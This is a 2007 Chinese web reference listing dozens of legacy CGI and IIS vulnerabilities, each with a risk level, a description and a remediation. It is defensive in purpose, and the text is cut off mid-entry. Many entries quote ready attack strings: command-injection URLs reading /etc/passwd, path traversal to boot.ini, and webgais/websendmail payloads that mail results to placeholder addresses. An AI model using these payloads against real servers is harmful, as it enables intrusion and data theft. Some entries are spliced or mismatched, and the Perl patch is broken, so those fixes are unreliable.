• <ruby id="5koa6"></ruby>
    <ruby id="5koa6"><option id="5koa6"><thead id="5koa6"></thead></option></ruby>

    <progress id="5koa6"></progress>

  • <strong id="5koa6"></strong>
    • 軟件測試技術
    • 軟件測試博客
    • 軟件測試視頻
    • 開源軟件測試技術
    • 軟件測試論壇
    • 軟件測試沙龍
    • 軟件測試資料下載
    • 軟件測試雜志
    • 軟件測試人才招聘
      暫時沒有公告

    字號: | 推薦給好友 上一篇 | 下一篇

    CGI安全漏洞資料速查

    發布: 2007-7-04 20:04 | 作者: admin | 來源:  網友評論 | 查看: 11次 | 進入軟件測試論壇討論

    領測軟件測試網 ################################################################
    #如有任何安全組織或個人愿意無嘗對此文進行長期的、不間斷地維護、
      更新或更改。請自行隨便,不必與我商討.但要求是成果必須完全地向
      internet公開。任何行為的私藏都是不受歡迎的。
    #本文歡迎轉摘.但請保持這些聲明。
    #如有任何問題或建議,請mailto:iwillsurewin@163.net
    ################################################################

    類型:攻擊型
    名字:phf
    風險等級:中
    描述:在NCSA或者Apache(1.1.1版本以內)非商業版本的WebServer中
        有一段程序util.c,允許黑客以root身份執行任何一個指令:
    http://www.xxx.com/cgi-bin/phf?Qname=root%0Asome%20command%20here
    建議:無
    解決方法:把Apachewebserver升級到1.1.1以上,或者將NCSAwebserver
          升級到最新版本

    類型:攻擊型
    名字:wguset.exe
    風險等級:中
    描述:如果您使用NT做為您的WebServer的操作系統,而且wguest.exe存
        在于您的Web可執行目錄中的話,入侵者將能利用它閱讀到您的硬
        盤上所有USR_用戶能閱讀的文件
    建議:將wguset.exe從你的Web目錄移走或刪除
    解決方法:將wguset.exe從你的Web目錄移走或刪除

    類型:攻擊型
    名字:rguset.exe
    風險等級:中
    描述:如果您使用NT做為您的WebServer的操作系統,而且rguest.exe存
        在于您的Web可執行目錄中的話,入侵者將能利用它閱讀到您的硬
        盤上所有USR_用戶能閱讀的文件
    建議:將rguset.exe從你的Web目錄移走或刪除
    解決方法:將rguset.exe從你的Web目錄移走或刪除

    類型:攻擊型
    名字:perl.exe
    風險等級:低
    描述:在cgi-bin執行目錄下存在perl.exe,這屬于嚴重的配置錯誤。黑客
        可以在perl.exe后面加一串指令,利用瀏覽器在server上執行任何
        腳本程序
    建議:perl.exe是放在任何帶執行權限的web目錄下都是不安全的
    解決方法:在web目錄下移除perl.exe這個程序.

    類型:攻擊型
    名字:shtml.exe
    風險等級:低
    描述:如果您使用FrontPage作為您的WebServer,那么入侵者能夠利用
        IUSR_用戶和shtml.exe入侵您的機器,做您不希望的事
    建議:將shtml.exe從你的Web目錄移走或刪除
    解決方法:將shtml.exe從你的Web目錄移走或刪除

    類型:攻擊型
    名字:wwwboard.pl
    風險等級:低
    描述:wwwboard.pl程序容易引起攻擊者對服務器進行D.O.S攻擊
    建議:如無必要可以刪除該文件
    解決方法:對get_variables的子程序中的下面這段:
    if($FORM{'followup'}){$followup="1";
    @followup_num=split(/,/,$FORM{'followup'});
    $num_followups=@followups=@followup_num;
    $last_message=pop(@followups);
    $origdate="$FORM{'origdate'}";
    $origname="$FORM{'origname'}";
    $origsubject="$FORM{'origsubject'}";}

    替換為:

    if($FORM{'followup'}){
    $followup="1";
    @followup_num=split(/,/,$FORM{'followup'});
    $num_followups=@followups=@followup_num;
    $last_message=pop(@followups);
    $origdate="$FORM{'origdate'}";
    $origname="$FORM{'origname'}";
    $origsubject="$FORM{'origsubject'}";
    #WWWBoardBombPatch
    #WrittenBy:SamuelSparlingsparling@slip.net)
    $fn=0;
    while($fn<$num_followups)
    {
    $cur_fup=@followups$fn];
    $dfn=0;
    foreach$fm(@followups)
    {
    if(@followups[$dfn]==@followups[$fn]&&$dfn!=$fn)
    {
    &error(board_bomb);
    }
    $dfn++;
    }
    $fn++;
    }
    #EndWWWBoardBombPatch
    }

    類型:攻擊型
    名字:uploader.exe
    風險等級:中
    描述:如果您使用NT作為您的WebServer的操作系統,入侵者能夠利用
        uploader.exe上傳任何文件
    建議:將uploader.exe從你的Web目錄移走或刪除
    解決方法:將uploader.exe從你的Web目錄移走或刪除

    類型:攻擊型
    名字:bdir.htr
    風險等級:高
    描述:如果您使用NT做為您的WebServer的操作系統,而且bdir.htr存在
        于您的Web可執行目錄中的話,入侵者將能利用它在您的服務器上
        無止境的創建ODBC數據庫,并生成一些可執行的文件。
    建議:將bdir.htr從你的Web目錄移走或刪除
    解決方法:將bdir.htr從你的Web目錄移走或刪除

    類型:攻擊型
    名字:Count.cgi
    風險等級:高
    描述:在/cgi-bin目錄下的Count.cgi程序(wwwcount2.3版本)有一個溢出
        錯誤,允許入侵者無須登錄而遠程執行任何指令。
    建議:如無必要可以刪除該文件
    解決方法:將wwwcount升級到2.4或者以上

    類型:攻擊型
    名字:test-cgi
    風險等級:高
    描述:test-cgi這個文件可以被入侵者用來瀏覽服務器上的重要信息
    建議:建議審核cgi-bin目錄下的執行程序,嚴格控制訪問權限
    解決方法:刪除test-cgi文件

    類型:攻擊型
    名字:nph-test-cgi
    風險等級:高
    描述:nph-test-cgi這個文件可以被入侵者用來瀏覽服務器上的重要信息
    建議:建議審核cgi-bin目錄下的執行程序,嚴格控制訪問權限
    解決方法:刪除nph-test-cgi文件

    類型:攻擊型
    名字:php.cgi
    風險等級:低
    描述:php.cgi程序有較多的漏洞,包括緩存溢出漏洞,還有導致任何系
        統文件可以被入侵者讀取的漏洞
    建議:建議審核cgi-bin目錄,避免有不必要的程序存在
    解決方法:刪除php.cgi程序是最好的辦法

    類型:攻擊型
    名字:handler
    風險等級:低
    描述:IRIX5.3,6.2,6.3,6.4的/cgi-bin/handler程序存在緩存溢出
        錯誤,允許入侵者在server上遠程執行一段程序:
        telnettarget.machine.com80
        GET/cgi-bin/handler/whatever;cat/etc/passwd|?data=Download
        HTTP/1.0
    建議:建議審核cgi-bin目錄,避免有不必要的程序存在
    解決方法:刪除handler文件

    類型:攻擊型
    名字:webgais
    風險等級:高
    描述:/cgi-bin,目錄下的webgais是GAIS搜索工具的一個接口,它有一個
        毛病使入侵者可以繞過程序的安全機制,執行系統命令:
        POST/cgi-bin/webgaisHTTP/1.0
        Content-length:85(replacethiswiththeactuallengthof
        the"exploit"line)
        telnettarget.machine.com80query=';mail+you\@your.host
    建議:建議審核cgi-bin目錄,避免有不必要的程序存在
    解決方法:刪除webgais文件

    類型:攻擊型
    名字:websendmail
    風險等級:高
    描述:/cgin-bin目錄下的websendmail程序允許入侵者執行一個系統指令:
        telnettarget.machine.com80
        POST/cgi-bin/websendmailHTTP/1.0
        Content-length:xxx(shouldbereplacedwiththeactual
        lengthofthestringpassedtotheserver,inthiscase
        xxx=90) receiver=;mail+your_address\@somewhere.org
        &content=a
    建議:建議審核cgi-bin目錄,避免有不必要的程序存在
    解決方法:高級用戶:編輯websendmail腳本,過濾特殊字符
    一般用戶:刪除websendmail文件

    類型:攻擊型
    名字:webdist.cgi
    風險等級:高
    描述:對于Irix6.2和6.3平臺,/cgi-bin目錄下的webdist.cgi有一個弱點
        允許入侵者無須登錄而在系統上執行任何指令:
        http://host/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd
    建議:建議審核cgi-bin目錄,避免有不必要的程序存在
    解決方法:刪除/var/www/cgi-bin/webdist.cgi目錄下的webdist.cgi

    類型:攻擊型
    名字:faxsurvey
    風險等級:高
    描述:在LinuxS.u.S.E上/cgi-bin目錄下的faxsurvey程序允許入侵者無
        須登錄就能在服務器執行指令:http://joepc.linux.elsewhere.org/
        cgi-bin/faxsurvey?/bin/cat%20/etc/passwd
    建議:建議審核cgi-bin目錄,避免有不必要的程序存在
    解決方法:刪除/cgi-bin/faxsurvey文件

    類型:攻擊型
    名字:htmlscript
    風險等級:中
    描述:安裝了htmlscript2.99x或者更早版本的服務器,存在一個毛病使
        入侵者可以查看服務器上的任何文件:
        http://www.vulnerable.server.com/cgi-bin/htmlscript?../../
        ../../etc/passwd
    建議:建議審核cgi-bin目錄,避免有不必要的程序存在
    解決方法:刪除/cgi-bin/htmlscript腳本文件,或者將htmlscript升級到
          3.0以上

    類型:攻擊型
    名字:pfdisplay
    風險等級:中
    描述:在Irix6.4或者更早版本的web服務器上,/cgi-bin/pfdisplay程序
        允許入侵者非法查看服務器上的文件
    建議:建議審核cgi-bin目錄,避免有不必要的程序存在
    解決方法:刪除/cgi-bin/pfdisplay文件,或者打補丁,補丁可以去
          sgigate.sgi.com(204.94.209.1)或者ftp.sgi.com下載:
          Filename:README.patch.3018
          Algorithm#1(sum-r):3795511README.patch.3018
          Algorithm#2(sum):1545511README.patch.3018
          MD5checksum:1169EB51D75E0794C64C2C1FD6211B69
          Filename:patchSG0003018
          Algorithm#1(sum-r):016792patchSG0003018
          Algorithm#2(sum):128762patchSG0003018
          MD5checksum:BD16A53A0AE693D6E9E276EE066BDBC8
          Filename:patchSG0003018.idb
          Algorithm#1(sum-r):013392patchSG0003018.idb
          Algorithm#2(sum):2512patchSG0003018.idb
          MD5checksum:1CB16E6A8C50BF17CD02A29C2E4D35EB
          Filename:patchSG0003018.performer_tools_man
          Algorithm#1(sum-r):102018patchSG0003018.per-
          -former_tools_man
          Algorithm#2(sum):31448patchSG0003018.performer_t-
          -ools_man
          MD5checksum:B6B3D90FAB9B5A342397C3E5AF5A8D29
          Filename:patchSG0003018.performer_tools_sw
          Algorithm#1(sum-r):4847418patchSG0003018.perform-
          -er_tools_sw
          Algorithm#2(sum):2817618patchSG0003018.performer_
          tools_sw
          MD5checksum:DF4E8ED8326A6A0B39F7B4D67E5FD71F

    類型:攻擊型
    名字:www-sql
    風險等級:中
    描述:www-sql存在于/cgi-bin/目錄下,這將導致入侵可以越權訪問被保
        護的文件
    建議:最好刪除www-sql文件
    解決方法:#ifPHPFASTCGI
          while(FCGI_Accept()>=0)
          {
          #endif
          s=getenv("REDIRECT_STATUS");
          if(!s){
          puts("Content-type:text/plain\r\n\r\nPHP/FIdetected
          aninternalerror.Pleaseinformsa@hogia.netofwhat
          youjustdid.\n");
          exit(1);
          }
          s=getenv("PATH_TRANSLATED");

    類型:攻擊型
    名字:view-source
    風險等級:高
    描述:在cgi-bin目錄下的view-source程序沒有對輸入進行安全檢查,使
        入侵者可以查看服務器上的任何文件
    建議:建議審核cgi-bin目錄,避免有不必要的程序存在
    解決方法:刪除/cgi-bin目錄下的viewsource程序

    類型:攻擊型
    名字:campas
    風險等級:高
    描述:在cgi-bin目錄下的campas程序有一個毛病可以使入侵者隨意查看
        server上的重要文件:
        telnetwww.xxxx.net80
        Trying200.xx.xx.xx...
        Connectedtovenus.xxxx.net
        Escapecharacteris'^]'.
        GET/cgi-bin/campas?%0acat%0a/etc/passwd%0a
    建議:建議審核cgi-bin目錄,避免有不必要的程序存在
    解決方法:刪除/cgi-bin目錄下的campas程序

    類型:攻擊型
    名字:aglimpse
    風險等級:高
    描述:在cgi-bin目錄下的aglimpse程序有一個毛病可以使入侵者無須登
        錄而隨意執行任何指令 
    建議:建議審核cgi-bin目錄,避免有不必要的程序存在
    解決方法:刪除/cgi-bin目錄下的aglimpse程序

    類型:攻擊型
    名字:AT-admin.cgi
    風險等級:中
    描述:在ExciteforWebServers1.1上的/cgi-bin/AT-admin.cgi程序,允
        許普通用戶完全控制整個系統
    建議:建議審核cgi-bin目錄,避免有不必要的程序存在
    解決方法:刪除/cgi-bin目錄下的AT-admin.cgi程序

    類型:攻擊型
    名字:finger
    風險等級:中
    描述:這個位于/cgi-bin下的finger程序,可以查看其它服務器的信息,
        但是如果將參數改成本機,本機上的帳號信息將暴露無遺:
        /cgi-bin/finger?@localhost
    建議:建議審核cgi-bin目錄,避免有不必要的程序存在
    解決方法:刪除/cgi-bin目錄下的finger程序

    類型:攻擊型
    名字:webwho.pl
    風險等級:中
    描述:如果在您的Web可執行目錄中有webwho.pl這個CGI腳本,那么入侵
        者將能利用他閱讀啟動Web的用戶能讀寫執行的任何文件。
    建議:將webwho.pl從您的Web目錄中刪除或移走
    解決方法:將webwho.pl從您的Web目錄中刪除或移走

    類型:攻擊型
    名字:w3-msql
    風險等級:低
    描述:MiniSQL軟件包發行版本附帶的一個CGI(w3-msql)可被用于以
        httpd的uid權限執行任意代碼。這個安全漏洞是由程序中的scanf()
        函數引起的。
    建議:如果您安裝了MiniSQL軟件包,請您將/cgi-bin/目錄下的w3-msql文
        件刪除或移走
    解決方法:如果您安裝了MiniSQL軟件包,請您將/cgi-bin/目錄下的w3-msql
          文件刪除或移走.或使用以下補丁。

    補。

    ------w3-msql.patch---------

    410c410
    scanf("%s",boundary); <br>---
    <scanf("%128s",boundary);>
    418c418
    <strcat(var,buffer);
    <strncat(var,buffer,sizeof(buffer));
    428c428
    <scanf("Content-Type:%s",buffer);>
    <scanf("Content-Type:%15360s",buffer);>

    ------w3-msql.patch---------

    類型:攻擊型
    名字:NetscapeFastTrackserver2.0.1a
    風險等級:中
    描述:UnixWare7.1附帶的NetscapeFastTrackserver2.0.1a存在一個遠程
        緩沖區溢出漏洞。缺省地,監聽457端口的httpd通過http協議提供
        UnixWare文檔。如果向該服務器傳送一個長度超過367字符的GET請
        求,會使緩沖區溢出,EIP值被覆蓋將可能導致任意代碼以httpd權
        限執行。
    建議:臨時解決方法是關閉NetscapeFastTrack服務器
    解決方法:臨時解決方法是關閉NetscapeFastTrack服務器。

    類型:攻擊型
    名字:AnyForm.cgi
    風險等級:高
    描述:位于cgi-bin目錄下的AnyForm.cgi程序,是用于簡單表單通過郵件
        傳遞響應的,但該程序對用戶輸入檢查不徹底,可被入侵者利用,
        在server上執行任何指令.
    建議:建議審核cgi-bin目錄,避免有不必要的程序存在
    解決方法:建議升級該cgi程序,或者刪除該文件

    類型:攻擊型
    名字:whois.cgi
    風險等級:低
    描述:在多個WebServer中帶有的Whois.cgi存在溢出漏洞。它們包括:
    WhoisInternicLookup-version:1.02
    CCWhois-Version:1.0
    Matt'sWhois-Version:1
       他們將使入侵者能夠在您的系統上使用啟動httpd用戶的權限執行任
    意的代碼
    建議:將在您Web目錄中問whois.cgi刪除或移走
    解決方法:將在您Web目錄中問whois.cgi刪除或移走

    類型:攻擊型
    名字:environ.cgi
    風險等級:中
    描述:在Apachewebserver或者IIS等其它webserver的/cgi-bin/environ.cgi
        程序,有一個毛病允許入侵者繞過安全機制,瀏覽服務器上的一些
        文件。
    建議:建議審核cgi-bin目錄,避免有不必要的程序存在
    解決方法:建議升級該cgi程序,或者刪除該文件

    類型:攻擊型
    名字:wrap
    風險等級:中
    描述:/cgi-bin/wrap程序有兩個漏洞,均允許入侵者獲取服務器上文件
        的非法訪問,如:
        http://host/cgi-bin/wrap?/../../../../../etc
    建議:建議審核cgi-bin目錄,避免有不必要的程序存在
    解決方法:刪除/cgi-bin/wrap文件

    類型:攻擊型
    名字:edit.pl
    風險等級:中
    描述:/cgi-bin/edit.pl有一個安全弱點,用下面這條命令就可以訪問用
        戶的配置情況:
      http://www.sitetracker.com/cgi-bin/edit.pl?account=&password=
    建議:建議審核cgi-bin目錄,避免有不必要的程序存在
    解決方法:刪除/cgi-bin/edit.pl文件

    類型:攻擊型
    名字:service.pwd
    風險等級:中
    描述:UNix系統的http://www.hostname.com/_vti_pvt/service.pwd可讀,
        將暴露用戶密碼信息
    建議:建議刪除
    解決方法:chownrootservice.pwd chmod700service.pwd

    類型:攻擊型
    名字:administrators.pwd
    風險等級:中
    描述:UNix系統的http://www.hostname.com/_vti_pvt/administrators.pwd
        可讀,將暴露用戶密碼信息
    建議:建議刪除
    解決方法:chownrootadministrators.pwd chmod700administrators.pwd
    相關連接: 

    類型:攻擊型
    名字:users.pwd
    風險等級:中
    描述:UNix系統的http://www.hostname.com/_vti_pvt/users.pwd可讀,
        將暴露用戶密碼信息
    建議:建議刪除
    解決方法:chownrootusers.pwd chmod700users.pwd

    類型:攻擊型
    名字:authors.pwd
    風險等級:中
    描述:UNix系統的http://www.hostname.com/_vti_pvt/authors.pwd可讀,
        將暴露用戶密碼信息
    建議:建議刪除
    解決方法:chownrootauthors.pwd chmod700authors.pwd

    類型:攻擊型
    名字:visadmin.exe
    風險等級:中
    描述:在OmniHTTPdWebServer的cgi-bin目錄下存在這個文件visadmin.exe,
        那么攻擊者只要輸入下面的命令:
        http://omni.server/cgi-bin/visadmin.exe?user=guest數分鐘之
        后服務器的硬盤將會被撐滿
    建議:建議刪除
    解決方法:把visadmin.exe從cgi-bin目錄中刪除

    類型:攻擊型
    名字:get32.exe
    風險等級:高
    描述:Alibaba的webserver,其cgi-bin目錄存在get32.exe這個程序,允
        許入侵者任意執行一條指令:
    http://www.victim.com/cgi-bin/get32.exe|echo%20>c:\command.com
    建議:建議刪除
    解決方法:把GET32.exe從cgi-bin目錄中刪除

    類型:攻擊型
    名字:alibaba.pl
    風險等級:高
    描述:Alibaba的webserver,其cgi-bin目錄存在alibaba.pl這個程序,允
        許入侵者任意執行一條指令:
        http://www.victim.com/cgi-bin/alibaba.pl|dir
    建議:建議刪除
    解決方法:把alibaba.pl從cgi-bin目錄中刪除

    類型:攻擊型
    名字:tst.bat
    風險等級:高
    描述:Alibaba的webserver,其cgi-bin目錄存在tst.bat這個程序,允許
        入侵者任意執行一條指令:
    http://www.victim.com/cgi-bin/tst.bat|type%20c:\windows\win.ini
    建議:建議刪除
    解決方法:把tst.bat從cgi-bin目錄中刪除

    類型:攻擊型
    名字:fpcount.exe
    風險等級:低
    描述:如果您使用NT作為您的WebServer的操作平臺,并只安裝了SP3補丁,
        那么入侵者能利用這個CGI程序進行DoS攻擊,使您的IIS服務拒絕
        訪問。
    建議:將在您Web目錄中的fpcount.exe刪除或移走
    解決方法:將在您Web目錄中的fpcount.exe刪除或移走

    類型:攻擊型
    名字:openfile.cfm
    風險等級:低
    描述:如果在您的Web目錄中含有
        /cfdocs/expeval/exprcalc.cfm
        /cfdocs/expeval/sendmail.cfm
        /cfdocs/expeval/eval.cfm
        /cfdocs/expeval/openfile.cfm
        /cfdocs/expeval/displayopenedfile.cfm
        /cfdocs/exampleapp/email/getfile.cfm
        /cfdocs/exampleapp/publish/admin/addcontent.cfm
       這些文件,那么入侵者可能能夠利用它們讀到您系統上的所有文件
    建議:將在您Web目錄中的openfile.cfm刪除或移走
    解決方法:將在您Web目錄中的openfile.cfm刪除或移走

    類型:攻擊型
    名字:exprcalc.cfm
    風險等級:低
    描述:如果在您的Web目錄中含有
        /cfdocs/expeval/exprcalc.cfm
        /cfdocs/expeval/sendmail.cfm
        /cfdocs/expeval/eval.cfm
        /cfdocs/expeval/openfile.cfm
        /cfdocs/expeval/displayopenedfile.cfm
        /cfdocs/exampleapp/email/getfile.cfm
        /cfdocs/exampleapp/publish/admin/addcontent.cfm
       這些文件,那么入侵者可能能夠利用它們讀到您系統上的所有文件
    建議:將在您Web目錄中的exprcalc.cfm刪除或移走
    解決方法:將在您Web目錄中的exprcalc.cfm刪除或移走
    相關連接:http://www.allaire.com/handlers/index.cfm?ID=8727&Method=Full

    類型:攻擊型
    名字:displayopenedfile.cfm
    風險等級:低
    描述:如果在您的Web目錄中含有
        /cfdocs/expeval/exprcalc.cfm
        /cfdocs/expeval/sendmail.cfm
        /cfdocs/expeval/eval.cfm
        /cfdocs/expeval/openfile.cfm
        /cfdocs/expeval/displayopenedfile.cfm
        /cfdocs/exampleapp/email/getfile.cfm
        /cfdocs/exampleapp/publish/admin/addcontent.cfm
       這些文件,那么入侵者可能能夠利用它們讀到您系統上的所有文件
    建議:將在您Web目錄中的displayopenedfile.cfm刪除或移走
    解決方法:將在您Web目錄中的displayopenedfile.cfm刪除或移走

    類型:攻擊型
    名字:sendmail.cfm
    風險等級:中
    描述:將在您Web目錄中的openfile.cfm刪除或移走
        在多個WebServer中帶有的Whois.cgi存在溢出漏洞。它們包括:
        WhoisInternicLookup-version:1.02
        CCWhois-Version:1.0
        Matt'sWhois-Version:1
        他們將使入侵者
        能夠在您的系統上使用啟動httpd用戶的權限執行任意的代碼
        如果在您的Web目錄中含有
        /cfdocs/expeval/exprcalc.cfm
        /cfdocs/expeval/sendmail.cfm
        /cfdocs/expeval/eval.cfm
        /cfdocs/expeval/openfile.cfm
        /cfdocs/expeval/displayopenedfile.cfm
        /cfdocs/exampleapp/email/getfile.cfm
        /cfdocs/exampleapp/publish/admin/addcontent.cfm
       這些文件,那么入侵者可能能夠利用它們讀到您系統上的所有文件
    建議:將在您Web目錄中的sendmail.cfm刪除或移走
    解決方法:將在您Web目錄中的sendmail.cfm刪除或移走

    類型:攻擊型
    名字:codebrws.asp
    風險等級:中
    描述:如果您使用NT+IIS作為您的WebServer的情況下,入侵者能夠利用
        這個ASP查看您系統上所有啟動httpd用戶有權限閱讀的文件請前往
        以下地址查詢補丁InternetInformationServer:
        ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/usa/
        Viewcode-fix/
        SiteServer:
        ftp://ftp.microsoft.com/bussys/sitesrv/sitesrv-public/fixes/
        usa/siteserver3/hotfixes-postsp2/Viewcode-fix/
        http://www.microsoft.com/security/products/iis/checklist.asp
    建議:將在您Web目錄中的codebrws.asp刪除或移走
    解決方法:將在您Web目錄中的codebrws.asp刪除或移走

    類型:信息型
    名字:codebrws.asp_1
    風險等級:中
    描述:在/iissamples/exair/howitworks/下面存在codebrws.asp文件,
        用下面的路徑:
        http://www.xxx.com/iissamples/exair/howitworks/codebrws.asp?
        source=/index.asp就可以查看到index.asp的源碼。實際上任何
        ascii文件都可以瀏覽。
    建議:刪除名叫/iissamples/的web目錄
    解決方法:將在您Web目錄中的codebrws.asp刪除或移走
    請前往以下地址查詢補丁
    InternetInformationServer:
    ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/usa/Viewcode-fix/
    SiteServer:
    ftp://ftp.microsoft.com/bussys/sitesrv/sitesrv-public/fixes/usa/
    siteserver3/hotfixes-postsp2/Viewcode-fix/
    http://www.microsoft.com/security/products/iis/checklist.asp
    相關連接:ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/
    usa/Viewcode-fix/

    類型:攻擊型
    名字:showcode.asp_1
    風險等級:中
    描述:在/msads/Samples/SELECTOR/目錄下存在showcode.asp文件,用下
        面的路徑:
    http://www.xxx.com/msadc/Samples/SELECTOR/showcode.asp?source=/
    msadc/Samples/../../../../../boot.ini

      可以查到boot.ini文件的內容;實際上入侵者能夠利用這個ASP查看您
    系統上所有啟動httpd用戶有權限閱讀的文件

    建議:禁止對/msads目錄的匿名訪問
    解決方法:將在您Web目錄中的showcode.asp刪除或移走
    請前往以下地址查詢補丁
    InternetInformationServer:
    ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/usa/
    Viewcode-fix/
    SiteServer:
    ftp://ftp.microsoft.com/bussys/sitesrv/sitesrv-public/fixes/usa/
    siteserver3/hotfixes-postsp2/Viewcode-fix/
    http://www.microsoft.com/security/products/iis/checklist.asp
    相關連接:ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/
    usa/Viewcode-fix/

    類型:攻擊型
    名字:/msadc目錄可以訪問
    風險等級:中
    描述:WindowsNTIISserver下的/msadc目錄可以訪問,會造成一系列安全
        問題,包括被入侵者非法調用應用程序
    建議:建議刪除不必要的由IIS缺省安裝形成的目錄
    解決方法:禁止/msadc目錄,如果必須打開該目錄,至少應該設置成合法
          用戶需要密碼才能訪問

    類型:攻擊型
    名字:search97.vts
    風險等級:中
    描述:這個文件將能使入侵者任意的讀取你系統中啟動httpd用戶能讀取
        的文件
    建議:將在您Web目錄中的search97.vts刪除或移走
    解決方法:將在您Web目錄中的search97.vts刪除或移走,或前往以下地址
          下載Patch
          https://customers.verity.com/products/server/310/
          patches/

    類型:攻擊型
    名字:carbo.dll
    風險等級:低
    描述:如果您安裝了SystemsrunningiCatSuiteversion3.0,那么它將自
        動在你的系統上添加一個叫carbo.dll的文件,而入侵者將能利用
        這個文件訪問您系統上的熱和文件
    建議:將在您Web目錄中的openfile.cfm刪除或移走
    解決方法:將在您Web目錄中的openfile.cfm刪除或移走

    類型:攻擊型
    名字:whois_raw.cgi
    風險等級:低
    描述:因為whois_raw.cgi作者的失誤,這個CGI將使入侵者能夠以您系統
        上啟動httpd的用戶的權限執行您系統上任意的程序
    建議:將在您Web目錄中的whois_raw.cgi刪除或移走
    解決方法:將在您Web目錄中的whois_raw.cgi刪除或移走

    類型:攻擊型
    名字:doc
    風險等級:低
    描述:您的Web目錄可以文件列表,這將幫助入侵者分析您的系統信息
    建議:將您的所有Web目錄設置為不能文件列表
    解決方法:將您的所有Web目錄設置為不能文件列表

    類型:攻擊型
    名字:.html/............./config.sys
    風險等級:低
    描述:如果您使用的是較久版本的ICQ,那么入侵者能夠利用它閱讀您機
        器上的所有文件
    建議:下載新版本的ICQ
    解決方法:請前往以下地址下載新版本的ICQ

    類型:攻擊型
    名字:....../
    風險等級:中
    描述:您使用的WebServer軟件能使入侵者閱讀您系統上的所有文件
    建議:更換或升級您的WebServer軟件
    解決方法:更換或升級您的WebServer軟件

    類型:攻擊型
    名字:no-such-file.pl
    風險等級:低
    描述:由于您的WebServer軟件的缺陷,使得入侵者能夠利用不存在的CGI
        腳本請求來分析您的站點的目錄結構
    建議:升級您的WebServer軟件
    解決方法:升級您的WebServer軟件

    類型:攻擊型
    名字:_vti_bin/shtml.dll
    風險等級:低
    描述:入侵者利用這個文件將能使您的系統的CPU占用率達到100%
    建議:將_vti_bin/shtml.dll從您的Web目錄刪除或移走
    解決方法:將_vti_bin/shtml.dll從您的Web目錄刪除或移走

    類型:信息型
    名字:nph-publish
    風險等級:中
    描述:在/cgi-bin目錄下存在nph-publish文件,這使入侵者能通過www瀏
        覽服務器上的任何文件
    建議:建議審查/cgi-bin目錄,刪除不必要的cgi程序
    解決方法:刪除nph-publish文件

    類型:信息型
    名字:showcode.asp
    風險等級:中
    描述:在/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Sampl
        es/SELECTOR/目錄下存在showcode.asp文件可以被入侵者利用來查
        看服務器上的文件內容
    建議:最好禁止/msadc這個web目錄的匿名訪問,建議刪除這個web目錄
    解決方法:刪除showcode.asp文件

    類型:信息型
    名字:_vti_inf.html
    風險等級:中
    描述:web根目錄下存在_vti_inf.html文件,該文件是Frontpageexten-
        -tionserver的特征,包含了一系列FrontpageExtentionServer的重
        要信息;而且FrontpageExtentionserver是一個有很多漏洞的web
        服務,用它入侵者可能直接修改首頁文件。
    建議:用ftp等其它方式上載網頁文件
    解決方法:卸載FrontpageExtentionServer

    類型:信息型
    名字:index.asp::$DATA
    風險等級:中
    描述:asp程序的源代碼可以被后綴+::$DATA的方法查看到,這樣入侵者可
        以設法查到服務器數據庫密碼等重要信息
    建議:建議留意微軟最新關于codeview的補丁和安全公告
    解決方法:安裝servicespack6或者打補丁:
    ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/chs/security/
    fesrc-fix/
    相關連接:ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/
    chs/security/fesrc-fix/

    類型:攻擊型
    名字:main.asp%81
    風險等級:低
    描述:asp程序的源代碼可以被后綴+%81的方法查看到,這樣入侵者可以設
        法查到服務器數據庫密碼等重要信息
    建議:建議留意微軟最新關于codeview的補丁和安全公告
    解決方法:安裝servicespack6或者打補丁:
    ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/chs/security
    /fesrc-fix/
    相關連接:ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/
    chs/security/fesrc-fix/

    類型:信息型
    名字:showcode.asp_2
    風險等級:中
    描述:在/msadc/Samples/SELECTOR/目錄下存在showcode.asp文件,用下
        面的路徑:http://www.xxx.com/msadc/Samples/SELECTOR/showcode.
        asp?source=/msadc/Samples/../../../../../boot.ini可以查到
        boot.ini文件的內容;實際上入侵者能夠利用這個ASP查看您系統上
        所有啟動httpd用戶有權限閱讀的文件
    建議:禁止對/msadc目錄的匿名訪問
    解決方法:將在您Web目錄中的showcode.asp刪除或移走
    請前往以下地址查詢補丁
    InternetInformationServer:ftp://ftp.microsoft.com/bussys/iis/iis
    -public/fixes/usa/Viewcode-fix/
    SiteServer:
    ftp://ftp.microsoft.com/bussys/sitesrv/sitesrv-public/fixes/usa/
    siteserver3/hotfixes-postsp2/Viewcode-fix/
    http://www.microsoft.com/security/products/iis/checklist.asp
    相關連接:ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/
    usa/Viewcode-fix/

    類型:攻擊型
    名字:ism.dll
    風險等級:高
    描述:在/scripts/iisadmin/目錄下存在ism.dll文件,這個文件有一個溢
        出錯誤,允許入侵者在服務器上執行任意一段程序;另外。攻擊者
        還隨時可以令服務器的www服務死掉
    建議:禁止對/scripts目錄的匿名訪問
    解決方法:刪除/scripts/iisadmin/ism.dll,或者打開iis的管理控制臺,
          選取默認web站點,點右鍵,選取屬性,點:"主目錄",在起始
          點那行點"配置"按鈕,將".htr"的應用程序映射項刪除

    類型:信息型
    名字:codebrws.asp_2
    風險等級:中
    描述:在/iissamples/sdk/asp/docs/下面存在codebrws.asp文件,用下面
        的路徑:http://www.xxx.com/iissamples/exair/howitworks/code
        brws.asp?source=/index.asp就可以查看到index.asp的源碼。實
        際上任何ascii文件都可以瀏覽。
    建議:刪除名叫/iissamples/的web目錄
    解決方法:將在您Web目錄中的codebrws.asp刪除或移走
    請前往以下地址查詢補丁
    InternetInformationServer:
    ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/usa/Viewcode-fix/
    SiteServer:
    ftp://ftp.microsoft.com/bussys/sitesrv/sitesrv-public/fixes/usa/
    siteserver3/hotfixes-postsp2/Viewcode-fix/
    http://www.microsoft.com/security/products/iis/checklist.asp
    相關連接:ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/
    usa/Viewcode-fix/

    類型:攻擊型
    名字:uploadn.asp
    風險等級:高
    描述:在/scripts/tools目錄下存在uploadn.asp程序,只要入侵者有一個
